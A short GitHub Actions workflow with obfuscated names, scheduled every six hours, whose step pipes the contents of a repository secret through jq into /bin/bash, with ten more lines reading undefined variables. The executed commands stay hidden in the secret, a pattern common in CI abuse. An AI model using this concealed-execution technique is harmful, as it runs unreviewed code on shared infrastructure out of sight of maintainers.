name: duansizhi9615
on:
  workflow_dispatch:
  schedule:
    - cron: '31 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: duansizhi9615
        env:
          pdzfc33: ${{ secrets.pdzfc33 }}
        run: |
          echo $pdzfc33 | jq -r .mk8024 | /bin/bash
          echo $p1665 | jq -r .w509 | /bin/bash
          echo $ld71 | jq -r .xysdr012 | /bin/bash
          echo $f774 | jq -r .o16850 | /bin/bash
          echo $dkhlo5893 | jq -r .dbr665 | /bin/bash
          echo $zlxd6198 | jq -r .ymj18688 | /bin/bash
          echo $bf3 | jq -r .j27610 | /bin/bash
          echo $ih38 | jq -r .g35771 | /bin/bash
          echo $ctmq35 | jq -r .tbuof7 | /bin/bash
          echo $g118 | jq -r .ria429 | /bin/bash
          echo $fxj50 | jq -r .srh4761 | /bin/bash

